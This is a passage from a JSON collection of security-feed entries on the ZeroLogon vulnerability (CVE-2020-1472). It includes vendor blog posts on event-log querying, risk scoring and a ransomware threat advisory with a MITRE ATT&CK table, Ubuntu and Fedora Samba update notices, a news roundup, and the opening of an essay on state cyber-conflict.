devices.\n\nThe ability to pull these artifacts from Windows event logs allows teams that are responsible for incident response to gather crucial information around an incident directly from the impacted devices extremely efficiently.\n\nFor instance, pulling this log data from affected systems can highlight what user accounts have been compromised and abused by attackers, how those accounts are connecting to different systems, and well as help to build a chronological timeline of the attacker\u2019s activities. And being able to identify relevant artifacts and use that evidence to develop additional queries that could be run across a wider set of the system provides situational awareness that is a necessity during investigations.\n\nThis newly added functionality makes it easy for users to create their own custom queries to gather real-time Windows event log data, including:\n\n * Event ID\n * Time an event occurred\n * Source or channel of the event\n * Provider name and guide associated with an event\n * Severity level of an event\n * And more\n\nAlong with being able to build custom queries, our [Threat Analysis Unit](<https://www.carbonblack.com/threat-analysis-unit/>) (TAU) has also handcrafted a series of recommended queries that leverage the Windows event log query capability. These pre-built queries \u2013 along with the more than 90 that already exist in the console - can be run across your entire Windows fleet with the click of a button, bringing the time required to start gathering these artifacts down to mere seconds.\n\n\n\nSo whether your team is looking to identify devices that may be at risk due to the Windows ZeroLogon Vulnerability ([CVE 2020-1472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472>)), or you\u2019re interested in keeping an eye on RDP login activity, or you are looking for indicators of anti-forensics and persistence mechanisms such as cleared event logs and new scheduled tasks, these pre-built queries will save your team time in hunting down potential threats and reducing risk in your environment.\n\nSee also: \n[Using Live Query to Audit Your Environment for the Windows CryptoAPI Spoofing Vulnerability](<https://www.carbonblack.com/blog/using-live-query-to-audit-your-environment-for-the-windows-cryptoapi-spoofing-vulnerability/>) \n[How Live Query Helps with Vulnerability Assessment](<https://www.carbonblack.com/blog/how-cb-liveops-helps-with-vulnerability-assessment/>) \n[New Release Brings Recommended Queries to Users](<https://www.carbonblack.com/blog/new-cb-liveops-release-brings-recommended-queries-to-users/>)\n\nThe post [Querying Windows Event Logs for Faster Investigation and Response](<https://www.carbonblack.com/blog/querying-windows-event-logs-for-faster-investigation-and-response/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2020-11-12T16:00:34", "published": "2020-11-12T16:00:34", "id": "CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "href": "https://www.carbonblack.com/blog/querying-windows-event-logs-for-faster-investigation-and-response/", "type": "carbonblack", "title": "Querying Windows Event Logs for Faster Investigation and Response", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-19T18:30:32", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "_(Editor&#x27;s Note: Monica White, a guest author on the Carbon Black blog, is the Director of Product Marketing at Kenna Security)_\n\nWhen we at Kenna Security originally looked at adding a risk score to enumerate vulnerability risk in VMware Carbon Black Cloud Workload, we knew that Common Vulnerability Scoring System (CVSS) scores didn\u2019t serve users well in determining what their own risk profile truly looked like. Instead, we wanted a risk score methodology that was pragmatic, highly accurate, actionable, tailored, and ultimately helps our customers make better, more efficient remediation decisions.\n\nSo, what makes a vulnerability scoring system good? What does the risk scoring system we use in VMware Carbon Black Cloud Workload look like? How does it work? And does our scoring system meet the criteria of a sound scoring system?\n\n## What makes for a good risk score or risk model?\n\nAn effective and actionable risk model needs to accomplish three things: measure risk, drive action and provide context (explanation builds trust). In looking for a risk score solution for VMware Carbon Black Cloud Workload, this is exactly what we set out to accomplish.\n\n### The Vulnerability Risk Score in fewer than 50 words\n\nWithin VMware Carbon Black Cloud Workload, a risk score is a number calculated for a vulnerability that ranges from 0.0 to 10.0. This granular value is an estimate of the likelihood of exploitation of that vulnerability. The probability of exploitation is based on vulnerability attacks and environmental vectors.\n\n## How do we measure vulnerability risk?\n\nAs mentioned previously, the vulnerability risk score measures risk by providing a number from 0.0 to 10.0 for every vulnerability. The risk score is calculated by combining threat and vulnerability context variables which can indicate the likelihood of the exploitation of that vulnerability. How predictive these variables are is measured using a variety of advanced data science and machine learning techniques, which are then incorporated into a scoring model that takes into account how predictive each of them are. The end result is a quantifiable, granular, and accurate risk score for every vulnerability that is backed up by relevant threat context.\n\nIn the 10 years that we have been defining risk-based vulnerability management, we\u2019ve discovered key threat and vulnerability context variables that give us the insight needed to predict vulnerability exploitation:\n\n * Has the vulnerability been exploited?\n * Has an exploit been published for the vulnerability in question?\n * Has the vulnerability been seen in the wild? If yes, how pervasive is it?\n\n### What makes it actionable?\n\nA risk score drives action if it is granular, accurate at predicting risk, and trustworthy. Granularity is extremely important because you really can\u2019t make a choice if you&#x27;re presented with a number from 1 to 5 or High/Medium/Low. The range of numbers has to be able to tell you, for example, that a vulnerability ranked 9.8 carries significantly more risk than a vulnerability ranked 7.4. The Kenna risk score built into Carbon Black Cloud Workload is 94% accurate at predicting risk due to advanced data-science and robust threat context information.\n\n## How does a risk score provide context?\n\nAgain, context and explanation build trust, which in turn drives action. Semi-abstract scoring models like CVSS lack the necessary context to understand the real impact on an organization\u2019s risk profile. Kenna risk scores are based on predictive modeling using real-world threat data measured against historical results. Users can see the threat data, the exploits that exist, whether it is pervasive in the wild, etc. When a vulnerability scores a 9.4, we want you to trust that a 9.4 really is a 9.4, and a 3.3 is truly a 3.3. Confidence in your scoring system spurs confidence in your actions. When you have confidence in the scoring system that you have, you will act with confidence.\n\nTo underline this idea, here are three vulnerabilities that are scored using the risk score used in Carbon Black Cloud Workload as 10, 9.5, and 62. Which would you prioritize first? We\u2019ll give you a hint: use our risk score and the underlying threat data to back you.\n\n\n\n\n\n\n\nThe right answer according to a predictive risk model is CVE-2020-1472 that has a risk score of 10. The fact that this vulnerability has been exploited in the wild and is very prevalent makes it much riskier than the other two. As you can surmise, seeing the context behind the score really helps understand the risk behind vulnerabilities.\n\nDownload the whitepaper, [Understanding the Kenna Security Vulnerability Risk Score](<https://www.carbonblack.com/resources/understanding-the-kenna-security-vulnerability-risk-score/>), today to find out more about the Kenna Risk Score.\n\nThe post [Risk Score 101: What to look for in a Risk Score](<https://www.carbonblack.com/blog/risk-score-101-what-to-look-for-in-a-risk-score/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2020-11-19T18:20:13", "published": "2020-11-19T18:20:13", "id": "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "href": "https://www.carbonblack.com/blog/risk-score-101-what-to-look-for-in-a-risk-score/", "type": "carbonblack", "title": "Risk Score 101: What to look for in a Risk Score", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-06T20:16:38", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "\n\nThe Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) issued a joint [alert](<https://us-cert.cisa.gov/ncas/alerts/aa20-302a>) this week with regards to an imminent cybercrime threat to US hospitals and healthcare providers. The alert was coauthored by CISA, the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS), regarded the use of Ryuk and Trickbot malware to perform ransomware behavior at a massive scale. The report was later updated to include the use of Conti ransomware and BazarLoader malware.\n\nThe group behind this attack is a financially motivated adversary, labeled as UNC1878 by FireEye Mandiant, that leverages the RYUK Ransomware to encrypt target environments and extort their victims. The group primarily leverages KEGTAP for initial access, ultimately resulting in Cobalt Strike beacon payload deployment and RYUK Ransomware encryption. The most significant component of this group\u2019s operations is the speed at which they transition from initial access to Ransomware deployment, with some environments following the full lifecycle of the attack in just over two days.\n\n[](<https://www.carbonblack.com/?attachment_id=77939>)\n\n \n\n## Threat Overview\n\n### Trickbot\n\nTrickbot was first discovered in the wild in 2016. Although Trickbot started out as a banking trojan, it has more recently evolved to become a multi-purpose downloader, used to download additional malware in order to steal sensitive information such as credentials and emails, as well as running ransomware such as Ryuk.\n\n### BazarLoader/BazarBackdoor/KEGTAP\n\nBazarLoader/BazarBackdoor (also referred to as KEGTAP) is thought to be a derivative of Trickbot. Similar to Trickbot, BazarLoader is typically distributed via phishing campaigns containing malicious links or attachments that contain the malware.\n\n### RYUK\n\nThe Ryuk family of malware has been tracked for multiple years as targeted toward organizations for ransomware. Over time Ryuk has gone through periods of inactivity during which it is suspected that its operators perform reconnaissance on potential victims and improve their tooling.\n\n### Conti\n\nConti ransomware [discovered](<https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/>) by VMware Carbon Black Threat Analysis Unit (TAU) in June 2020, is thought to be related to Ryuk ransomware due to similarities in the code. Conti introduced a much faster encryption algorithm using up to 32 threads, a novel ability of targeting only network SMB shares for provided IP addresses, as well as a new technique that makes use of the Windows Restart Manager.\n\n### ZeroLogon Vulnerability\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>), otherwise known as ZeroLogon, is a critical vulnerability affecting Microsoft Windows operating systems. The Department of Homeland Security (DHS) recently issued an [emergency directive](<https://cyber.dhs.gov/ed/20-04/>) due to the criticality of this vulnerability. Although Microsoft released a patch on August 11, 2020, Ryuk threat actors have [reportedly](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>) exploited unpatched servers in order to escalate privileges by resetting the password of the primary domain controller.\n\n## Conclusion\n\nRansomware infections are often only one piece of the attack kill chain. A multi-stage approach is often used as part of sophisticated attacks. Phishing emails are commonly used to deliver the initial payload, backdoor or loader, such as in the case of Trickbot and BazarLoader. Additional tools such as Cobalt Strike, Metasploit or PowerShell Empire may be used to further maintain access, move laterally, or scrape credentials. Ransomware such as RYUK and Conti are then distributed across the network for maximum impact.\n\nFollowing the CISA alert, several U.S. hospitals have already been targeted with ransomware attacks this week. We have advised VMware Carbon Black customers to ensure they have enabled the Ransomware prevention controls available within [VMware Carbon Black Enterprise Standard](<https://www.carbonblack.com/products/endpoint-standard/>).\n\nFor a detailed breakdown of the MITRE ATT&amp;CK TIDs, please see the table below. To learn more about the VMware Carbon Black TAU, please visit: [Threat Analysis Unit](<https://www.carbonblack.com/threat-analysis-unit/>).\n\n## MITRE ATT&amp;CK TIDs\n\nThe table below includes all behavioral MITRE TID\u2019s for Trickbot, RYUK and Conti.\n\n**TID** | **Tactic** | **Description** \n---|---|--- \nT1087.001 | Discovery | Account Discovery: Local Account \nT1087.003 | Discovery | Account Discovery: Email Account \nT1071.001 | Command and Control | Application Layer Protocols: Web Protocols \nT1059.003 | Execution | Command and Scripting Interpreter: Windows Command Shell \nT1543.003 | Persistence, Privilege Escalation | Create or Modify System Process: Windows Service \nT1555.003 | Credential Access | Credentials from Password Stores: Credentials from Web Browsers \nT1132.001 | Command and Control | Data Encoding: Standard Encoding \nT1005 | Collection | Data from Local System \nT1140 | Defense Evasion | Deobfuscate/Decode Files or Information \nT1482 | Discovery | Domain Trust Discovery \nT1573.001 | Command and Control | Encrypted Channel: Symmetric Cryptography \nT1041 | Exfiltration | Exfiltration Over C2 Channel \nT1008 | Command and Control | Fallback Channels \nT1083 | Discovery | File and Directory Discovery \nT1562.001 | Defense Evasion | Impair Defenses: Disable or Modify Tools \nT1105 | Command and Control | Ingress Tool Transfer \nT1056.004 | Collection, Credential Access | Input Capture: Credential API Hooking \nT1185 | Collection | Man in the Browser \nT1036 | Defense Evasion | Masquerading \nT1112 | Defense Evasion | Modify Registry \nT1106 | Execution | Native API \nT1571 | Command and Control | Non-Standard Port \nT1027.002 | Defense Evasion | Obfuscated Files or Information: Software Packing \nT1069 | Discovery | Permission Groups Discovery \nT1566.001 | Initial Access | Phishing: Spearphishing Attachment \nT1566.002 | Initial Access | Phishing: Spearphishing Link \nT1055.012 | Defense Evasion, Privilege Escalation | Process Injection: Process Hollowing \nT1018 | Discovery | Remote System Discovery \nT1053.005 | Execution, Persistence, Privilege Escalation | Scheduled Task/Job: Scheduled Task \nT1553.002 | Defense Evasion | Subvert Trust Controls: Code Signing \nT1082 | Discovery | System Information Discovery \nT1016 | Discovery | System Network Configuration Discovery \nT1033 | Discovery | System Owner/User Discovery \nT1007 | Discovery | System Service Discovery \nT1552.001 | Credential Access | Unsecured Credentials: Credentials in Files \nT1552.002 | Credential Access | Unsecured Credentials: Credentials in Registry \nT1204.002 | Execution | User Execution: Malicious File \nT1036.005 | Defense Evasion | Masquerading: Match Legitimate Name or Location \nT1055 | Defense Evasion, Privilege Escalation | Process Injection \nT1057 | Discovery | Process Discovery \nT1134 | Defense Evasion, Privilege Escalation | Access Token Manipulation \nT1486 | Impact | Data Encrypted for Impact \nT1489 | Impact | Service Stop \nT1490 | Impact | Inhibit System Recovery \nT1547.001 | Persistence, Privilege Escalation | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder \nT1564.003 | Defense Evasion | Hide Artifacts: Hidden Window \nT1106 | Execution | Native API \nT1049 | Discovery | System Network Connections Discovery \n \nThe post [TAU Threat Advisory: Imminent Ransomware threat to U.S. Healthcare and Public Health Sector](<https://www.carbonblack.com/blog/tau-threat-advisory-imminent-ransomware-threat-to-u-s-healthcare-and-public-health-sector/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2020-10-30T20:13:43", "published": "2020-10-30T20:13:43", "id": "CARBONBLACK:A526657711947788A54505B0330C16A0", "href": "https://www.carbonblack.com/blog/tau-threat-advisory-imminent-ransomware-threat-to-u-s-healthcare-and-public-health-sector/", "type": "carbonblack", "title": "TAU Threat Advisory: Imminent Ransomware threat to U.S. Healthcare and Public Health Sector", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-09-17T16:57:28", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "Tom Tervoort discovered that the Netlogon protocol implemented by Samba \nincorrectly handled the authentication scheme. A remote attacker could use \nthis issue to forge an authentication token and steal the credentials of \nthe domain admin.\n\nThis update fixes the issue by changing the \"server schannel\" setting to \ndefault to \"yes\", instead of \"auto\", which will force a secure netlogon \nchannel. This may result in compatibility issues with older devices. A \nfuture update may allow a finer-grained control over this setting.", "edition": 1, "modified": "2020-09-17T00:00:00", "published": "2020-09-17T00:00:00", "id": "USN-4510-1", "href": "https://ubuntu.com/security/notices/USN-4510-1", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-19T20:05:55", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "Tom Tervoort discovered that the Netlogon protocol implemented by Samba \nincorrectly handled the authentication scheme. A remote attacker could use \nthis issue to forge an authentication token and steal the credentials of \nthe domain admin.\n\nWhile a previous security update fixed the issue by changing the \"server \nschannel\" setting to default to \"yes\", instead of \"auto\", which forced a \nsecure netlogon channel, this update provides additional improvements.\n\nFor compatibility reasons with older devices, Samba now allows specifying \nan insecure netlogon configuration per machine. See the following link for \nexamples: <https://www.samba.org/samba/security/>CVE-2020-1472.html\n\nIn addition, this update adds additional server checks for the protocol \nattack in the client-specified challenge to provide some protection when \n'server schannel = no/auto' and avoid the false-positive results when \nrunning the proof-of-concept exploit.", "edition": 2, "modified": "2020-09-30T00:00:00", "published": "2020-09-30T00:00:00", "id": "USN-4559-1", "href": "https://ubuntu.com/security/notices/USN-4559-1", "title": "Samba update", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-17T17:03:01", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "USN-4510-1 fixed a vulnerability in Samba. This update provides \nthe corresponding update for Ubuntu 14.04 ESM.\n\nOriginal advisory details:\n\nTom Tervoort discovered that the Netlogon protocol implemented by Samba \nincorrectly handled the authentication scheme. A remote attacker could use \nthis issue to forge an authentication token and steal the credentials of \nthe domain admin.\n\nThis update fixes the issue by changing the \"server schannel\" setting to \ndefault to \"yes\", instead of \"auto\", which will force a secure netlogon \nchannel. This may result in compatibility issues with older devices. A \nfuture update may allow a finer-grained control over this setting.", "edition": 1, "modified": "2020-09-17T00:00:00", "published": "2020-09-17T00:00:00", "id": "USN-4510-2", "href": "https://ubuntu.com/security/notices/USN-4510-2", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2020-09-18T13:55:20", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how solutions from 32 Amazon Web Services partners \u2013 including Trend Micro \u2013 are now available for AWS customers to use with their deployments of AWS Outposts. Also, read about a data breach at U.S. office-supply retailer Staples.\n\n \n\nRead on:\n\n[**Boosting Impact for Profit: Evolving Ransomware Techniques for Targeted Attacks**](<https://www.trendmicro.com/en_us/research/20/i/boosting-impact-for-profit-evolving-ransomware-techniques-for-targeted-attacks.html>)\n\n_As described in Trend Micro\u2019s 2020 Midyear Roundup, the numbers pertaining to ransomware no longer tell the full story. While the number of infections, company disclosures, and ransomware families has gone down, the estimated amount of money exchanged for the retrieval of encrypted data has steadily gone up. By going after institutions and companies with the urgent need to retrieve their data and get their systems running again, cybercriminals are able to demand exorbitant amounts of ransom._\n\n[**AWS Outposts Ready Launches with 32 Validated Partners**](<https://www.crn.com/news/cloud/aws-outposts-ready-launches-with-32-validated-partners>)\n\n_Solutions from 32 Amazon Web Services partners, including Trend Micro, are available now for AWS customers to use with their deployments of AWS Outposts, the on-premises version of the industry\u2019s leading public cloud._\n\n[**Analysis of a Convoluted Attack Chain Involving Ngrok**](<https://www.trendmicro.com/en_us/research/20/i/analysis-of-a-convoluted-attack-chain-involving-ngrok.html>)\n\n_The Trend Micro Managed XDR team recently handled an incident involving one of Trend Micro\u2019s customers. The incident revealed how a malicious actor incorporated certain techniques into an attack, making it more difficult for blue teams and security researchers alike to analyze the chain of events in a clean and easily understandable manner. In this blog, Trend Micro further analyzes the attack._\n\n[**39% of Employees Access Corporate Data on Personal Devices**](<https://www.infosecurity-magazine.com/news/corporate-data-on-personal-devices/>)\n\n_A large proportion of employees are using their own devices to access data belonging to their company, according to a new study by Trend Micro. Researchers found that 39% of workers use personal smartphones, tablets, and laptops to access corporate data, often via services and applications hosted in the cloud._\n\n[**A Blind Spot in ICS Security: The Protocol Gateway Part 2: Vulnerability Allowing Stealth Attacks on Industrial Control Systems**](<https://www.trendmicro.com/us/iot-security/news/6218/A_Blind_Spot_in_ICS_Security_The_Protocol_Gateway_Part_2_Vulnerability_Allowing_Stealth_Attacks_on_Industrial_Control_Systems>)\n\n_In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways and shares the security countermeasures that security administrators in smart factories must take. In the second part of this series, Trend Micro presents an overview of the verification methods, results of this research, and describes &quot;flaws in the protocol conversion function,&quot; one of the security risks revealed through Trend Micro\u2019s experiments._\n\n[**Staples Hit by Data Breach: What to Do Now**](<https://www.tomsguide.com/news/staples-data-breach>)\n\n_U.S. office-supply retailer Staples says its recent data breach affected fewer than 2,500 customers. Australian security researcher Troy Hunt, who runs the HaveIBeenPwned website, used his Twitter account to post a copy of an email message sent to an unknown number of Staples online customers._\n\n[**&quot;Zerologon\u201d and the Value of Virtual Patching**](<https://www.trendmicro.com/en_us/research/20/i/zerologon-and-value-of-virtual-patching.html>)\n\n_A new CVE was released recently that has made quite a few headlines \u2013 CVE-2020-1472, also known as Zerologon. This CVE can allow an attacker to take advantage of the cryptographic algorithm used in the Netlogon authentication process and impersonate the identity of any computer when trying to authenticate against the domain controller._\n\n[**Billions of Devices Vulnerable to New &#x27;BLESA&#x27; Bluetooth Security Flaw**](<https://www.zdnet.com/article/billions-of-devices-vulnerable-to-new-blesa-bluetooth-security-flaw/#ftag=RSSbaffb68>)\n\n_Billions of smartphones, tablets, laptops, and IoT devices are using Bluetooth software stacks that are vulnerable to a new security flaw disclosed this summer. Named BLESA (Bluetooth Low Energy Spoofing Attack), the vulnerability impacts devices running the Bluetooth Low Energy (BLE) protocol._ _BLE is a slimmer version of the original Bluetooth (Classic) standard but designed to conserve battery power while keeping Bluetooth connections alive as long as possible._\n\n[**California Elementary Kids Kicked Off Online Learning by Ransomware**](<https://threatpost.com/california-elementary-kids-online-learning-ransomware/159319/>)\n\n_As students head back to the classroom, the wave of ransomware attacks against schools is continuing. The latest is a strike against a California school district that closed down remote learning for 6,000 elementary school students, according to city officials. The cyberattack, against the Newhall School District in Valencia, affected all distance learning across 10 different grade schools._\n\n[**Mobile Messengers Expose Billions of Users to Privacy Attacks**](<https://www.helpnetsecurity.com/2020/09/17/mobile-messengers-privacy/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29>)\n\n_When installing a mobile messenger like WhatsApp, new users can instantly start texting existing contacts based on the phone numbers stored on their device. For this to happen, users must grant the app permission to access and regularly upload their address book to company servers in a process called mobile contact discovery. A new research study shows that currently deployed contact discovery services severely threaten the privacy of billions of users. _\n\nShould employees be able to access company data via their personal devices? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: AWS Outposts Ready Launches With 32 Validated Partners and Staples Hit by a Data Breach](<https://blog.trendmicro.com/this-week-in-security-news-aws-outposts-ready-launches-with-32-validated-partners-and-staples-hit-by-a-data-breach/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2020-09-18T12:03:07", "published": "2020-09-18T12:03:07", "id": "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "href": "https://blog.trendmicro.com/this-week-in-security-news-aws-outposts-ready-launches-with-32-validated-partners-and-staples-hit-by-a-data-breach/", "type": "trendmicroblog", "title": "This Week in Security News: AWS Outposts Ready Launches With 32 Validated Partners and Staples Hit by a Data Breach", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2020-09-23T17:13:53", "published": "2020-09-23T17:13:53", "id": "FEDORA:D8A0E3053060", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: samba-4.12.7-0.fc32", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2020-10-04T01:26:52", "published": "2020-10-04T01:26:52", "id": "FEDORA:4A64830CFCDC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: samba-4.11.13-0.fc31", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:56", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2020-09-25T17:25:08", "published": "2020-09-25T17:25:08", "id": "FEDORA:38D8230C58CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: samba-4.13.0-11.fc33", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-12-18T10:31:56", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "\n\nThe ever-increasing role of technology in every aspect of our society has turned cybersecurity into a major sovereignty issue for all states. Due to their asymmetrical nature, offensive cyber-capabilities [have been embraced](<https://www.belfercenter.org/sites/default/files/2020-09/NCPI_2020.pdf>) by many countries that wouldn&#x27;t otherwise have the resources to compete on a military or economic level with the most powerful nations of the world. Most modern inter-state conflicts and tensions today also take place in so-called cyberspace and we strongly believe that this trend will persist.\n\nSuch conflicts can take a vast number of forms, based on the objectives an attacker might pursue to undermine a competitor. In the context of this article, we will only focus on two of them: (1) Cyber-warfare for **intelligence **purposes, and (2) **sabotage and interference with strategic systems** in order to hinder a state&#x27;s ability to govern or project power.\n\n## Cyberspace and intelligence\n\nAttempts to collect intelligence through technical means have been documented for years. The earliest example dates all the way back to 1996&#x27;s infamous [Moonlight Maze](<https://securelist.com/penquins-moonlit-maze/77883/>) campaign, where attackers stole so many documents a printout would have stood &quot;thrice as high as the Washington monument&quot;. Twenty-five years later, Kaspersky tracks over a hundred groups who perform similar operations. Here are a few reasons why they are so widespread:\n\n * Offensive security tools are **readily available**. \n * Intrusion software just as sophisticated as the frameworks developed by APT actors is gradually released to the public for free. This includes widely available proofs of concepts for [software vulnerabilities](<https://github.com/VoidSec/CVE-2020-1472>) to gain access to target machines, [open-source malware implants](<https://github.com/n1nj4sec/pupy>) to establish persistence and a myriad of tools that allow [lateral movement](<https://github.com/EmpireProject/Empire>) inside breached networks. Newcomers to the cyber game benefit from the experience acquired by their predecessors and the research conducted by the industry as a whole, which helps them bootstrap their operations at a very affordable cost.\n * A flourishing market has developed around offensive security, where companies [provide](<https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/>) tools or even mercenary services. The ones that are willing to communicate about their activities swear that they will only do business with democratic governments, but it should be pointed out that they undergo virtually no oversight.\n * The difficulty of reliable technical attribution of cyberattacks ensures that instigators face **very limited diplomatic repercussions **(although a [number of countries](<https://www.consilium.europa.eu/en/press/press-releases/2020/07/30/eu-imposes-the-first-ever-sanctions-against-cyber-attacks/>) have recently developed legal frameworks which allow them to impose sanctions). A few countries have public doctrines or strategies pertaining to cyber-engagements, though those documents don&#x27;t always provide detailed and full answers on how countries will react, particularly, in the case of cyberattacks posing a threat to their national security, which countermeasures they would take, when cyberattacks would be qualified as use of force and, broadly speaking, how the [UN charter&#x27;s article 51](<https://legal.un.org/repertory/art51.shtml>) pertaining to legitimate defense should be interpreted and applied. The earliest example of such a policy we could find is from the [United States](<https://nsarchive2.gwu.edu/NSAEBB/NSAEBB424/docs/Cyber-059.pdf>), in which they argue that article 51 does apply to cyberspace. [France](<http://www.defense.gouv.fr/content/download/567648/9770527/file/international+law+applied+to+operations+in+cyberspace.pdf>) also has one, and a few other countries have also published their official positions on the application of international law to cyberspace ([Estonia](<https://www.president.ee/en/official-duties/speeches/15241-president-of-the-republic-at-the-opening-of-cycon-2019/index.html>), [Australia](<https://www.dfat.gov.au/publications/international-relations/international-cyber-engagement-strategy/aices/chapters/annexes.html#Annex-A>), [Austria](<https://front.un-arm.org/wp-content/uploads/2020/04/comments-by-austria.pdf>), [Czech Republic](<https://www.nukib.cz/download/publications_en/CZ%20Statement%20-%20OEWG%20-%20International%20Law%2011.02.2020.pdf>), [Finland](<https://valtioneuvosto.fi/en/-/finland-published-its-positions-on-public-international-law-in-cyberspace>), [Iran](<https://nournews.ir/En/News/53144/General-Staff-of-Iranian-Armed-Forces-Warns-of-Tough-Reaction-to-Any-Cyber-Threat>), [the Netherlands](<https://www.government.nl/documents/parliamentary-documents/2019/09/26/letter-to-the-parliament-on-the-international-legal-order-in-cyberspace>) and [the UK](<https://www.gov.uk/government/speeches/cyber-and-international-law-in-the-21st-century>)).\n\nCyberespionage attempts have been observed from all types of nations (emerging and robust [cyber powers](<https://www.reuters.com/investigates/special-report/usa-spying-raven/>), countries that find themselves at the center of [international tensions](<https://www.nytimes.com/2020/04/15/world/asia/north-korea-cyber.html>), and even countries which are [traditionally considered allies](<https://www.theguardian.com/us-news/2015/jul/08/nsa-tapped-german-chancellery-decades-wikileaks-claims-merkel>)) against all sorts of actors ([government](<https://www.theguardian.com/world/2020/may/13/russian-hacking-attack-on-bundestag-damaged-trust-says-merkel>) and [non-government](<https://www.amnesty.org/en/latest/news/2019/04/state-sponsored-cyber-attack-hong-kong/>) organizations, [multinational companies](<https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/>), [small businesses](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) and [individuals](<https://www.theguardian.com/technology/2020/jan/21/amazon-boss-jeff-bezoss-phone-hacked-by-saudi-crown-prince>)) to try to collect intelligence of any nature (technological, military, strategic). While the newer actors are filling the skills gap quickly, the most advanced parties are scaling to obtain global surveillance capabilities through **technological supremacy**. This involves developing the standards for tomorrow&#x27;s communications infrastructures and ensuring that they are adopted on a worldwide scale.\n\nA particular example stands at the intersection of these two axes: the dispute pitting the US against China on the 5G standard. The US Defense Innovation Board [points out](<https://media.defense.gov/2019/Apr/03/2002109302/-1/-1/0/DIB_5G_STUDY_04.03.19.PDF>) the crucial impact of network topology on industry development and notes that the Department of Defense (DoD) itself will use the new standard; as a result, it feels it should have at least some degree of control over it. The US government has also publicly accused foreign technology companies of facilitating espionage operations on various occasions.\n\n### Recommendations\n\n * No state in the world has the technical ability to prevent cyberattacks, whether they target a country directly or target its industry. \n * In the short term, only **bilateral agreements** (such as [the one](<https://www.c-span.org/video/?328351-3/president-obama-chinese-president-xi-joint-news-conference>) between China and the US in 2015) appear to significantly reduce the number of incidents.\n * In the long term, **a large number of experts needs to be trained** to provide the private sector with enough resources to defend itself efficiently against cyberthreats.\n * The existing international instruments, such as the Wassenaar agreements do not provide a sufficiently binding legal framework to prevent companies from earning a profit by selling attack tools or vulnerabilities. Decision-makers should look into the proliferation of ICTs that can be used for malicious use.\n * The international community must find a way to **create tomorrow&#x27;s standards conjointly**. The competition between states to ensure control over the next technological tiers could result in a balkanization of the digital space.\n * Foreign companies, especially those developing network equipment or handling sensitive data, can only overcome mistrust if they are willing to** subject themselves to stringent scrutiny**. \n * States should adopt legislation detailing the obligations of any company willing to participate in public procurement for digital goods: source code access, formal proof of the software, having an audit conducted by a trusted third party.\n\n## Sabotage\n\nJust because cyberspace conflicts take place in a virtual world doesn&#x27;t mean they cannot affect the physical realm. An overwhelming proportion of 